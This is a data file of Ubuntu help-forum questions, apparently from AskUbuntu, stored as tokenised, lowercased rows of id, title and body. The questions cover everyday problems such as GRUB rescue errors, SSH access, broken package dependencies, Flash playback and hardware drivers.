435589	recover untitled document 1 from gedit	i have an unsaved document opened in gedit on xubuntu 13.10 . a bug caused gedit 's main window to disappear and only the title bar is still visible , reading `` untitled document 1 '' . is there a way to recover the typed text from the running but defunct session of gedit ? are `` untitled documents '' stored somewhere temporarily ?
435590	my boot screen for lubuntu does n't load correctly . how can i fix that ? thanks !	this would be my first post and i am not proficient in linux , although i do use it regularly as a layperson . i just dual-booted my old laptop with xp and lubuntu ( i have an emotional attachment to xp ) . however , the boot screen for lubuntu does n't load correctly . how can i fix that ?
435598	setting up the grub for future use	what i am currently working on is trying to set up my partitions/ grub to eventually dual-boot . currently for partitions , i have : the ubuntu partition , mounted to '/ ' , also flagged 'boot' a second , empty partition where the other linux system will go the 'extended ' , and 'swap ' partitions how do i set up the grub to eventually handle the boot ? result of sudo fdisk -l : device boot start end blocks id system /dev/sda1 * 2048 133627903 66812928 83 linux /dev/sda2 150013950 156301311 3143681 5 extended /dev/sda3 133627904 150011903 8192000 83 linux /dev/sda5 150013952 156301311 3143680 82 linux swap / solaris
435599	why 'make gconfig ' does not work while compiling the kernel ?	i am trying to compile vanilla linux kernel 3.12.14 downloaded from kernel.org . when i try make gconfig , it says : * unable to find the gtk+ installation . please make sure that * the gtk+ 2.0 development package is correctly installed ... * you need gtk+-2.0 , glib-2.0 and libglade-2.0 . * make [ 1 ] : *** no rule to make target 'scripts/kconfig/.tmp_gtkcheck ' , needed by `scripts/kconfig/gconf.o ' . stop . make : *** [ gconfig ] error 2 now it seems my ubuntu does n't have gtk+ by default , dpkg -s xxxx confirmed it . i tried installing all 3 of these using sudo apt-get install xxxx but no packages found . what can i do now ! ( is pygtk an answer ? ) note : xxxx is place holder for 3 missing packages named in the error .
435600	partitioning hard drive	i will be converting from windowsxp to ubuntu in a couple weeks . during the installation process , will 12.04.4 ask me what size of the partition i want to create ? is it necessary to create a partition ? when i last installed windowsxp on my laptop , i did not create a partition . this is my laptop . a toshiba 1.60ghz with 1.96gb ram pentium ( r ) m. so again , if i create a partition size would you recommend and why ?
435602	provide an xserver to chroot	description : i 'm using a lubuntu 13.10 x86-64 livecd to chroot into another lubuntu 13.10 x86-64 located on my hard drive in a folder called chroot . i 've had no trouble using the terminal to chroot in , and i can launch gui applications on my current xserver from the chroot after using `` xhost + '' on the livecd , but i need provide the chroot it 's own x output . i 've googled , searched askubuntu , and typed every command under the sun and moon all to no avail . i would love a solution , but would even be happy for a guess if you 've got one . i 've backed up the chroot so i can restore if it gets messed up . i 've also tried using xnest but it does n't want to work either . i would like to run the lxde desktop environment in the chroot , if possible logging in as a specific user . details : below are the commands i used to commence the chroot . sudo mount -- bind /dev /media/lubuntu/os/chroot/dev sudo mount -- bind /proc /media/lubuntu/os/chroot/proc sudo mount -- bind /sys /media/lubuntu/os/chroot/sys sudo cp /etc/resolv.conf /media/lubuntu/os/chroot/etc/resolv.conf xhost + sudo chroot /media/lubuntu/os/chroot i would also have typed `` export display=:0.0 '' in the chroot , but it worked without it . test results : test # 1 : description : i get a black screen on all outputs ( control+alt+fkeys ) , and i can not type anything . i 'm forced to kill the computer by hand . details : in chroot terminal type export display=localhost:1 in chroot terminal type startx -- :1 test # 2 : description : i get a black screen for f1 , pressing `` control + alt + f7 '' gets me back to my normal desktop . i can not type anything on the black screen . when i enter `` gksu leafpad '' in the chroot terminal on f7 i get an error that it `` can not open display localhost:1 '' . when i switch to f1 it now shows a terminal prompt for the livecd not the chroot . details : in chroot terminal type export display=localhost:1 in livecd terminal type sudo startx -- :1 test # 3 : [ edited in ] description : i get a blank black window , just as i would for xnest . when i try to launch xterm i get an error stating `` could not resolve hostname lubuntu : name or service not known '' . i 've also tried installing `` openssh-server '' in the chroot , and on the livecd . when i use the same commands on the livecd only and attempt to launch xterm from the livecd i do not get the same error . instead i get a password prompt . the livecd user `` lubuntu '' has no password . if i leave the password blank i get error `` permission denied . if i create a user account a retry it i get error `` permission denied , please try again '' when entering the correct user password . the `` could not resolve hostname lubuntu '' error experienced with the chroot also occurs when using apt-get in the chroot , though i can and have installed things from apt . details : in livecd terminal type xephyr -ac -screen 1024x768 -br -reset -terminate 2 > /dev/null :1 & in chroot terminal type display=:1.0 i also tried `` display=:1.0 '' in the livecd terminal . in chroot terminal type ssh -xfc -c blowfish root @ lubuntu xterm i also tried `` user @ server '' and `` root @ localhost '' in the chroot terminal . additional information anything else you want to know ? i 'll try to add it here .
435603	.desktop files : how to specify the icon path	i had a look at the .desktop files on my 12.04 ubuntu system , and many of them do not have a full path specification for their icon file . it is rather something like : icon=anjuta or icon=vlc or icon=application-x-clementine is there a common path where icons can be stored so that this can work ? if not , how does this work ? if i try to do the same thing with my own icons i have to specify the full path . e.g . icon=/usr/local/share/my-icon.png works fine , but icon=my-icon.png will fail . any kind of help is welcome !
435607	brand new to linux	i am new to linux , but have some tech skills . i can follow directions and learn quickly . i have an alienware 17 with the following specs : • intel core i7 4700mq 2.4 • 16gb ram • 4gb vram • nvidia gtx 780m • killer 802.11n ac wifi / bluetooth • 750gb hard drive • klipsch audio i am completely new to linux , but am super excited about being a part of the ideals behind it as i am a future developer . i would like to get all my drivers installed and working , maybe even the alienware aw command center . i have looked online and tried some things , but i 'm not having any luck . i was wondering if there is a place that i am for some reason not finding that i can go to assist me in doing this with some up-to-date and explicit instructions ? i am currently running ubuntu 12.04 with linux kernel 3.11 .
435608	how to get clean and build in netbeans to work again ?	i do n't know if this is a netbeans or ubuntu or java problem . but i 'm running ubuntu 13.10 64bit , and trying to create a jar file from my java application that i 've created with netbeans ide 7.0.1 . this is what happens when pressing the `` clean and build '' button init : deps-clean : updating property file : /home/jeggy/skjøl/netbeansprojects/kteditor/build/built-clean.properties deleting directory /home/jeggy/skjøl/netbeansprojects/kteditor/build clean : init : deps-jar : created dir : /home/jeggy/skjøl/netbeansprojects/kteditor/build updating property file : /home/jeggy/skjøl/netbeansprojects/kteditor/build/built-jar.properties created dir : /home/jeggy/skjøl/netbeansprojects/kteditor/build/classes created dir : /home/jeggy/skjøl/netbeansprojects/kteditor/build/empty created dir : /home/jeggy/skjøl/netbeansprojects/kteditor/build/generated-sources/ap-source-output compiling 11 source files to /home/jeggy/skjøl/netbeansprojects/kteditor/build/classes note : some input files use or override a deprecated api . note : recompile with -xlint : deprecation for details . note : /home/jeggy/skjøl/netbeansprojects/kteditor/src/connect.java uses unchecked or unsafe operations . note : recompile with -xlint : unchecked for details . copying 17 files to /home/jeggy/skjøl/netbeansprojects/kteditor/build/classes compile : created dir : /home/jeggy/skjøl/netbeansprojects/kteditor/dist copying 1 file to /home/jeggy/skjøl/netbeansprojects/kteditor/build /home/jeggy/skjøl/netbeansprojects/kteditor/nbproject/build-impl.xml:990 : the following error occurred while executing this line : /home/jeggy/skjøl/netbeansprojects/kteditor/nbproject/build-impl.xml:834 : copylibs does n't support the `` excludefromcopy '' attribute build failed ( total time : 0 seconds ) could someone explain or help me to get this fixed ?
435609	13.10 image burn issue	i downloaded the ubuntu 13.10 32-bit release to burn to a dvd on my windows 7 machine , and then install on an old xp machine . i am having trouble writing the image to a dvd with this error : the disc image did n't burn successfully because an error occurred ( error code : 0x080004005 ) every time i used the windows image burner on windows 7 and i have also tried an external burner with no luck . from what i have read , the dvd does n't need to be formatted correctly . is there something simple i am overlooking ?
435611	how do i fix this error while trying to install ubuntu from a usb ?	i 'm trying to install ubuntu onto my ssd drive , which already has windows 8.1 on it . i 've created a bootable usb drive with ubuntu 13.10 on by using unetbootin ( i also tried tuxboot , but that did n't work either . the problem is , when i try and boot into the usb to install ubuntu , i immediately get the message : error : file /boot/grub/i386-pc/normal.mod not found . it then puts me into grub rescue mode . i 've tried re downloading the ubuntu iso , reformatting the usb , recreating it.. but nothing seems to work .
435614	dash search does not find all of my files	for example : i create the file x.odt and then export it as pdf . after i click on dash search ( the files filter is active ) x . the x.odt appears with no problem but the x.pdf does not . that happens always . what should i do ?
435615	disable password authentication in ssh	i followed the following guide : help.ubuntu.com/community/ssh/openssh/configuring but it is still possible to ssh into the machine by entering a password ( tried on win with putty ) any advice ?
435616	can not play youtube videos in firefox - opera works ?	since a couple of days it is not possible for me to watch youtube videos in firefox - nevertheless i installed opera and tried it successfully to play videos with it . what i tried so far ( and did not work / change anything ) : started firefox in safe mode reinstalled flash package sudo apt-get install flashplugin-installer switched to html5 mode on youtube i also tried cd ; rm -r .adobe .macromedia i enabled / disabled hardware acceleration always same result : either error message an error occured or only black screen with spinning wheel . can anybody please help ? output of lsb_release -a ; uname -a ; dpkg -l | egrep 'flash|gnash|swf|lightspark' no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy linux architect 3.11.0-19-generic # 33-ubuntu smp tue mar 11 18:48:34 utc 2014 x86_64 x86_64 x86_64 gnu/linux ii flashplugin-installer 11.2.202.346ubuntu0.13.10.1 amd64 adobe flash player plugin installer and also tried with adobe package : no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy linux architect 3.11.0-19-generic # 33-ubuntu smp tue mar 11 18:48:34 utc 2014 x86_64 x86_64 x86_64 gnu/linux ii adobe-flash-properties-gtk 11.2.202.346-0saucy1 amd64 gtk+ control panel for adobe flash player plugin version 11 ii adobe-flashplugin 11.2.202.346-0saucy1 amd64 adobe flash player plugin version 11
435621	manually uninstall gdal	i followed a ./configure , make , make install approach when i originally installed gdal on my ubuntu machine , but now i want to upgrade to 1.10 . unfortunately , i want to use apt to perform the upgrade , but after performing an apt-get install i run gdal-config -- version i still get a version of 1.9 . i 've tried manually renaming the .so files in /usr/local/lib and /usr/lib but i still am unable to manually uninstall gdal . has anyone else had success doing this ?
435623	problem after update : blue screen with only the mouse cursor	my ubuntu 12.04 was normally updated through the update manager , something about gtk . then i rebooted and now all that shows after the splash screen is a blue screen that only shows the cursor .
435624	ca n't install software due to broken isc-dhcp-server dependency	while trying to setup hotspot i have messed up with the dhcp server setting , i do not know what went wrong but i am getting following error while installing anything : errors were encountered while processing : isc-dhcp-server dhcp3-server please help me to reset the setting to defaults as it were on a fresh ubuntu install . following is the error while updating firefox : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 526048 files and directories currently installed . ) preparing to replace firefox 27.0.1+build1-0ubuntu0.12.04.1 ( using ... /firefox_28.0+build2-0ubuntu0.12.04.1_i386.deb ) ... unpacking replacement firefox ... preparing to replace firefox-globalmenu 27.0.1+build1-0ubuntu0.12.04.1 ( using ... /firefox-globalmenu_28.0+build2-0ubuntu0.12.04.1_i386.deb ) ... unpacking replacement firefox-globalmenu ... preparing to replace firefox-locale-en 27.0.1+build1-0ubuntu0.12.04.1 ( using ... /firefox-locale-en_28.0+build2-0ubuntu0.12.04.1_i386.deb ) ... unpacking replacement firefox-locale-en ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... setting up isc-dhcp-server ( 4.1.esv-r4-0ubuntu5.9 ) ... start : job failed to start invoke-rc.d : initscript isc-dhcp-server , action `` start '' failed . dpkg : error processing isc-dhcp-server ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of dhcp3-server : dhcp3-server depends on isc-dhcp-server ; however : package isc-dhcp-server is not configured yet . dpkg : error processing dhcp3-server ( -- configure ) : dependency problems - leaving unconfigured setting up firefox ( 28.0+build2-0ubuntu0.12.04.1 ) ... no apport report written because maxreports is reached already no apport report written because maxreports is reached already please restart all running instances of firefox , or you will experience problems . setting up firefox-globalmenu ( 28.0+build2-0ubuntu0.12.04.1 ) ... setting up firefox-locale-en ( 28.0+build2-0ubuntu0.12.04.1 ) ... errors were encountered while processing : isc-dhcp-server dhcp3-server error in function : setting up isc-dhcp-server ( 4.1.esv-r4-0ubuntu5.9 ) ... start : job failed to start invoke-rc.d : initscript isc-dhcp-server , action `` start '' failed . dpkg : error processing isc-dhcp-server ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of dhcp3-server : dhcp3-server depends on isc-dhcp-server ; however : package isc-dhcp-server is not configured yet . dpkg : error processing dhcp3-server ( -- configure ) : dependency problems - leaving unconfigured below is the output of sudo apt-get install -f $ sudo apt-get install -f [ sudo ] password for parashar : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : liblaunchpad-integration1.0-cil libboost-iostreams1.46.1 libtommath0 openjdk-7-jre-lib use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 36 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up isc-dhcp-server ( 4.1.esv-r4-0ubuntu5.9 ) ... start : job failed to start invoke-rc.d : initscript isc-dhcp-server , action `` start '' failed . dpkg : error processing isc-dhcp-server ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of dhcp3-server : dhcp3-server depends on isc-dhcp-server ; however : package isc-dhcp-server is not configured yet . dpkg : error processing dhcp3-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : isc-dhcp-server dhcp3-server e : sub-process /usr/bin/dpkg returned an error code ( 1 )
435625	ctrl+alt+f7 and ctrl+alt+f8 not changing back into the x session !	i have ubuntu 12.04 lts and i want was opening my pc and after the grub menu , the screen went purple . ubuntu did n't load after that and the hard drive activity stopped . so i restarted the pc inti recovery with linux and ran dpkj and fsck to check file system . it does n't help , so i clicked on recovery ( the last option on the grub menu ) . it replied : error : file not found error : file not found error : load kernel first i do n't have windows or any other os . so in recovery mode i enabled networking and when it finished , it directed me to tty1 so i pressed ctrl+alt+f7 and f8 but nothing happened . now it always directs me to the tty1 and i can not access the gui or x mode . please help . i am really in trouble with this .
435627	can ssh onto server using putty , but not ssh from terminal	i have a very simple ubuntu server with a couple of git repos on it , nothing special . at home i used a windows pc , and use the putty program to interact with the server . at work however i have a mac , and using ssh to login to the server i am getting a timeout message each time . i know the server is up and running , because i am able to access it via a built in console function on my hosting website ( digital ocean ) . example : macbook-pro : documents jmr $ ssh jmr @ xxx.xxx.xxx.xxx ssh : connect to host xxx.xxx.xxx.xxx port 22 : operation timed out i 've searched around quite a bit for solutions to this specific issue but have yet to find anything that addresses this . any help is appreciated , thanks a lot !
435628	how to work around `` something wicked happened resolving '' errors	after this string in terminal - sudo apt-get install apache2 - it gives me errors failed to fetch http : //archieve.ubuntu.com/ubuntu/pool/main/a/apr-util/libaprutil 1_1.5.2-1_amd64.deb something wicked happened resolving 'archieve.ubuntu.com : http ' ( -5 - no adress associated with hostname ) what to do ? ? ?
435629	how to get text buffer from file and loading into textview using python and gtk+3	i want to create an ubuntu app that uses gtk+3 and python . however , i would like to know how i can get the text buffer from a file and load it into a textview . does anyone know how this can be done using a filechooserdialog ?
435630	x11vnc and screen help	hello all i am asking once again for a little help . here is my question i am trying to run a x11vnc the thing is i want it to be launched with a service command but not at startup and as well i want it running inside a screen session when it does start . i also want it to be able to view the root screen for the greeter . i am running ubuntu 13.04 with lightdm is there any way i can make this happen . the command i am trying to run is screen -s `` x11vnc '' -d -m & & screen -r `` x11vnc '' -x `` /usr/bin/x11vnc -once -rfbauth /home/passwd -xkb -rfbport 5900 -auth /var/run/lightdm/root/:0 -display :0 -bg '' it would also need to use the root user for the greeter display so using the lightdm session is there anyway to make it run something like me=`whoami` as_user ( ) { if [ $ me == $ username ] ; then bash -c `` $ 1 '' else su - $ username -c `` $ 1 '' fi } where username = root if anyone can help me figure this out please let me know . and thanks for your time .
435631	how to erase a complete line left of cursor ?	if i want to erase a complete line right of my cursor , i can use ctrl+shift+delete . but what if i wanted to delete a line the other way ? ctrl+shift+backspace deletes only one word - the same behavior as ctrl+backspace . on a mac you can use cmd+backspace for this . in a terminal you can use ctrl+u . the only way i could think of is first selecting the text with shift+home and then pressing either backspace or delete , but that is a two-step process . is it possible to use mac-like or terminal-like functionality , for example map ctrl+shift+delete to this behavior ?
435633	trying to install rdpdesk-3.0	i believe i have installed all the prerequisites that the manual listed ... for building under linux : download rdpdesk source g++ autotools-dev libxt-dev ( > =1.0.6-0 ) libgtk2.0 ( > = 2.18.0 ) libglib2.0 ( > =2.22.0-0 ) x11proto-core libwxbase2.8 ( > = 2.8.9 ) libwxgtk2.8 ( > = 2.8.9 ) libssl-dev i then ran these commands in the location where i unpacked the rdpdesk files ./autogen.sh ./configure i believe these go through fine , but if you want me to post the results , i can . last , but not least , i ran these commands make sudo make install but it errors out . result below ... rdpdesk-frdpoptionsdialog.o rdpdesk- frdpkeyboard.o rdpdesk-autoupdate.o rdpdesk-catcherwindowid.o -pthread -wl , -bsymbolic-functions -wl , -z -wl , relro -l/usr/lib/x86_64-linux-gnu -lwx_gtk2u_richtext-2.8 -lwx_gtk2u_aui-2.8 -lwx_gtk2u_xrc-2.8 -lwx_gtk2u_qa-2.8 -lwx_gtk2u_html-2.8 -lwx_gtk2u_adv-2.8 -lwx_gtk2u_core-2.8 -lwx_baseu_xml-2.8 -lwx_baseu_net-2.8 -lwx_baseu-2.8 -lglib-2.0 -lssl -lcrypto -lxaw -lz -ljpeg -pthread /usr/bin/ld : rdpdesk-rdpconnection_nix.o : undefined reference to symbol 'gtk_widget_reparent' /usr/lib/x86_64-linux-gnu/libgtk-x11-2.0.so.0 : error adding symbols : dso missing from command line collect2 : error : ld returned 1 exit status make [ 3 ] : *** [ rdpdesk ] error 1 make [ 3 ] : leaving directory `/home/fmccrary/downloads/rdpdesk-3.2/src' make [ 2 ] : *** [ all-recursive ] error 1 make [ 2 ] : leaving directory `/home/fmccrary/downloads/rdpdesk-3.2/src' make [ 1 ] : *** [ all ] error 2 make [ 1 ] : leaving directory `/home/fmccrary/downloads/rdpdesk-3.2/src' make : *** [ all-recursive ] error 1 any help would be greatly appreciated .
435634	dvd 's wo n't play with 13.10	dvd 's used to play with 12.04 , but since i upgraded to 13.10 i ca n't get any type of dvd to read . i have tried totem and vlc . i have also installed the following : sudo apt-get install gstreamer0.10-plugins-ugly gstreamer0.10-ffmpeg libxine1-ffmpeg gxine mencoder libdvdread4 totem-mozilla icedax tagtool easytag id3tool lame nautilus-script-audio-convert libmad0 mpg321 and sudo /usr/share/doc/libdvdread4/install-css.sh
435635	problem with compatibility printer konica minolta bizhub 215	so i have the konica minolta bizhub 215 but there is no driver for it , or at least that i have found . i have read that the drivers from the bizhub 223 can work fine but i have downloaded the files from the official webpage and there are some .ppd files inside a .zip but i have tried to install and every time i try to print it prints a page with the following line : % ! ps-adobe-3.0 % produced by poppler pdftops version : 0.24.1 followed by printing nothing in every page until it runs of paper . either way i would like to know if there is a way to install the driver for the bizhub 215 and if there is n't a way , an alternative because i need the printer to work whaterver i have to do . p.d : i use ubuntu 13.10 x86 and the printer is connected to the router .
435636	trouble finding/installing cpu driver for amd fx 8350	i 'm very much new to linux , but i 've hunted for days and can not find any solution to my problem . i 'm trying to use cpufreq to control the throttle on my cpu ( amd fx-8350 , 64-bit ) , but i apparently do not have drivers for the cpu : galaxy @ milkyway : / $ cpufreq-info cpufrequtils 008 : cpufreq-info ( c ) dominik brodowski 2004-2009 report errors and bugs to cpufreq @ vger.kernel.org , please . analyzing cpu 0 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms. analyzing cpu 1 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms. analyzing cpu 2 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms. analyzing cpu 3 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms . i think the drivers i have available to try are : galaxy @ milkyway : / $ ls /lib/modules/ $ ( uname -r ) /kernel/drivers/cpufreq/ amd_freq_sensitivity.ko p4-clockmod.ko speedstep-lib.ko but modprobe ca n't see them ? : galaxy @ milkyway : /lib/modules/3.11.0-18-generic/kernel/drivers/cpufreq $ sudo modprobe amd_freq_sensitivity.ko fatal : module amd_freq_sensitivity.ko not found . the same thing happens with any of the three . i 've tried some various other tweaks on modprobe and every time i get a fatal . i must being making some silly mistake . are these even the right drivers ? help ! edit : i do n't know if this matters , but i have ubuntu running inside a virtualbox .
435642	frozen screen after login ubuntu12lts new installation	help please ! installed windows 7 and ubuntu 12lts dual boot in separate partitions on a new hard drive . when i try to boot ubuntu , after logging in the screen is frozen with a black screen and the application loader on the left and a status bar at the top . sometimes get an error message that compiz has closed unexpectedly . if i choose recovery mode at boot up and then resume normal boot all seems well . tried nomodeset at start up and this also seems to work . using a laptop with an intel 82945gm chipset graphics - is this a driver problem ? if so , how do i rectify ? totally new to ubuntu and do not understand or know anything about the commands , but keen to learn if someone out there will help !
435645	persistent error when trying to install ubuntu using usb method	i 've been trying to install ubuntu onto my ssd using a bootable usb that i created using the ubuntu iso and unetbootin . however when i restart my computer , press f8 , and choose to boot from the usb , i get an error message : error : file /boot/grub/i386-pc/normal.mod not found i 've downloaded the iso file twice , formatted and recreated the usb with unetbootin , but i get the same error .
435646	how to change bluetooth peripheral device name ?	does anyone know how to change the name of peripheral bluetooth devices in ubuntu 13.10 ? i have a logitech audio receiver that always shows up as `` ( 94 ) logitech adapter '' but i would like it to say something like `` speakers livingroom '' . i have already tried changing it manually in var/lib/bluetooth/xx : xx : xx : xx : xx : xx/ but it always gets set back to `` ( 94 ) logitech adapter '' on reconnect . also it would be cool if it could show up to new devices like other ubuntu machines and phones as `` speakers livingroom '' , not `` ( 94 ) logitech adapter '' . thank you for your help , theo edit i do n't want to change the name of my computer but the name of the bluetooth peripheral . as far as i can make out this post only gives instructions to change the name of the computer ( ubuntu ) itself
435648	xserver-common-lts-raring missing ?	hello been having problems through out my upgrade . was not able to install packages till i removed the if fi statement in /var/lib/dpkg/info/xserver-common-lts-raring.postrm now looks like : # ! /bin/sh set -e exit 0 ubuntu throws errors constantly about missing this package . when i try to install the package : niel @ niel-linux : /var/lib/dpkg/info $ sudo apt-get install xserver-common-lts-raring reading package lists ... done building dependency tree reading state information ... done package xserver-common-lts-raring is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'xserver-common-lts-raring ' has no installation candidate niel @ niel-linux : /var/lib/dpkg/info $ p.s . running bumblebeed nvidia 765m intel 4700k cyberpower fangbook
435649	could i make automatic backup folder for all new files i create or download ?	i want to make a folder for all the new files i create , some times i create them at different places ( e.g desktop , download , document etc ) the question why would i do that ? and the answer is i always try a new things especially new os and because i always write the observation and notes every where on that new os , as an example i may write a doc at desktop then i may write and save another one at document folder and i may download a doc or learn pic at any time , some times and suddenly some thing goes wrong and my os fall , so i start to get all what i made out of that os and of course that take time and not 100 % accurate because of that i want to make an idea to make a folder at another partation to contain another copy for all what i make work automatically without a single click waste of time note i do n't want to make a backup for all os because i may forget to make before os fail
435651	will dragon naturally speaking work in a windows 7 vm running in ubuntu ?	about the only windows app i want is dragon naturally speaking . i know people have had some ( partial ? ) success - at least with older versions running under wine , but i would like to get the full product running in a windows 7 vm - probably using virtualbox . i am currently running kubuntu precise with lots of backports , but could upgrade if that would help . can this be done ? i am also open to any other approach that will yield a stable working solution .
435652	lost password , recovery mode does n't help	a friend of mine has a old ubuntu laptop that he wants to put back into use , but since it has been some time since he used it he has forgotten his password . i 've looked up how to change but none of them will work . i have also tried using the recovery mode , but using the root mode is locked also and requires a password . ( we can not reformat the disk due to some pictures on it . ) thank you in advance ! : )
435655	gparted merge unallocated space to ext4 partition	here i want to merge unallocated space to ext4 partition . but during running in ubuntu it is not allowed . am i right ? it has key picture . i must do that ubuntu dvd booting from it and selecting try ubuntu there with gparted , i must merge this unallocated part by right clicking on ext4 partition and then selecting shrink . am i right ? then for swap area i want to take 5gb from extended partition ( which is now called d on windows ) . can i format this partition in windows or should i use gparted ? but in gparted it has key picture . or in the same way should i do this during trying ubuntu to merge unallocated space to ext4 ? thank you for your answers .
435658	what 's the best way to make a qt executable program run as a service in ubuntu	i 've written my qt code for an embedded system which is running on ubuntu . i want to run my program as a service in ubuntu so i can stop or start it using monit . i 've seen some people creating a new file in /etc/init.d and adding their executable file path in there . but i want to know what 's the best way to run my program as a service ? thanks
435659	customize kde tiling grid	in kde , when the user is moving a window around with the mouse and she touches a border of the screen , a shadow appears showing the position the window will occupy if the user drops it there . when the mouse is against the top border , the whole screen is offered , if it 's against left or right borders near the middle , half of the screen is offered . it it 's against those borders but near the top or the bottom , a quarter of the screen is offered . what i want is a way to configure that feature so the left side offers 4/5 of the screen and the right side offers 1/5 only . on windows xp i used to do it with gridmove : http : //jgpaiva.dcmembers.com/gridmove.html this particular utility allows the user to define drop zones that are linked to ( usually similar ) target areas where the window would appear positioned .
435662	oauth no longer working - getting 404	i have been using oauth1.0a for ages in an android app accessing ubuntu one . recently it started failing with a 404 not found error , when trying to get request token . using these endpoints : request_token_url = `` https : //one.ubuntu.com/oauth/request/ '' ; user_authorization_url = `` https : //one.ubuntu.com/oauth/authorize/ ? description=something '' ; access_token_url = `` https : //one.ubuntu.com/oauth/access/ '' ; is this no longer supported ? the documenttation seems to have vanished..
435663	bulk renaming program sort manually	very often i want to batch rename files by simply giving a string thatâs combined with a number like : newname-01 , newname-02 , ... but i usually want to sort the files before doing that . iâve tested gprename , pyrename and some more but none of them allow me to set a custom order before the files are renamed . i thought there was a feature for this in digikam but its only for photos and maybe videos . so does anybody know a renamer that handles the sorting as well ? preferably for gnome .
435672	lubuntu download/upgrade	have the alternate iso downloaded.32 bit.i could not download torrent.now i seem to have to download more and more just to get into the files.i simply want the best way to install this operating system without a bunch of b.s.i am doing my best to get this right the first time.i am new to linux and i am sure i am missing something , i get that.next will i need something i am missing such as drivers or something ? i am trying to ask good questions.my ultimate goal is to completely erase/delete windows xp from my inspiron 1500 notebook ( present from mom , not getting rid of it ! ) and using lubuntu . plz b patient.i am a troglodyte ( knuckledragger ) , i work in the construction & oilfield industry.thankyou.b blessed .
435673	i 've wiped my hard drive , ca n't install ubuntu 12.04 ( graphical error ? )	i 'm trying to install ubuntu 12.04 onto my laptop . i have it on a usb , from the ubuntu site . i deleted the previous partition table using gparted on a separate usb . it is completely unallocated . when i load from the ubuntu usb and select `` try ubuntu '' it tells me that it 's stopping system v runtime compatibility and the screen goes black . when i try to install i just get a white screen after the ubuntu dots loading page . i used the terminal in the gparted usb , lspci -nn showed amd/ati kabini [ radeon hd 8240 ] ati 1002:9838 .
435674	what 3d effects unity2d lacks ?	i know that , unity2d is meant to work on systems without hardware acceleration , like arm-based platforms and as a result it is incapable of the advanced 3d effects that unity offers ; what are they ?
435677	java applet with object - chrome	i downloaded jdk 7 update 51 from official java.com & this was compulsory for my net-banking application . with firefox , it works fine but in chrome , it can not load some windows which are necessary for loading token file for payment . when i test java from their site it says that java is installed but when i test on http : //www.w3.org/people/mimasa/test/object/java/othello with firefox there is two games , one with java applet with applet and another java applet with object . with chrome i only see java applet under applet . is this a problem ? i am currently using 13.10 & newbie to linux . if anyone has a solution to make java fully work under chrome , i would be very thankful .
435679	in grub went into system settings and changed priority of boot drives , now only booting to grub rescue . help ?	whenever i power on i get this screen , where i can enter commands : error : no such device : e9e6b763-5dcc-821b-acc69c2eaaee . entering rescue mode ... grub rescue > i have seen some other posts of similar problems , where the answerer told them to boot a livecd and then do a boot repair . the problem is i do n't know how to do that from here , if that 's even possible . i did an ls command and the output was : ( hd0 ) ( hd1 ) ( hd1 , gpt1 ) ( hd2 ) ( hd2 , gpt9 ) ( hd2 , gpt8 ) ( hd2 , gpt7 ) ( hd2 , gpt6 ) ( and so on ... ) ( hd2 , gpt1 ) i 'd like to get some help in figuring out how to boot my linux livecd from this menu . thanks ! edit : this problem has officially been solved , but my low reputation means i can not answer my own question for an other 8 hours . i will post what i did after that time .
435680	can i upgrade ubuntu 11.04 to 12.04	i 'm currently running ubuntu 11.04 on my asus eee pc 1000h can i upgrade straight to 14.04 ?
435681	boot error when linux is instaled with the windows installer	i have windows 8 on my laptop . i instaled ubuntu with the windows installer . when i start my computer i can choose windows 8 or uduntu . windows woks perfecly but when i choose ubuntu the computer display the boot error message .
435684	ubuntu for android . is it available to the average joe ?	ok so i was poking around on the internet looking to dual boot my laptop ( windows 7 and ubuntu ) and saw the ubuntu for android page and was super excited . i want to install the ubuntu full desktop os on my lg optimus g pro , but have a few questions . i poked around for answers but none were answered by the ubuntu site or forums i could find . is ubuntu for android something that can be added to existing phones , or is it something pre-installed on phones at purchase ? where does one get the necessary docking device for the phone to connect to a monitor ? or again is it something that comes with specific phones ? i see lists of required specs everywhere but nothing saying how to actually get ubuntu for android . im a little frustrated about the lack of information on the main site about who , how , and when people can obtain ubuntu for android . i was pumped up for it by the page , but was a little disappointed that i could not find out how ( or if ) i can install it . i would really appreciate if someone can fill me in on ubuntu for android 's status . thanks !
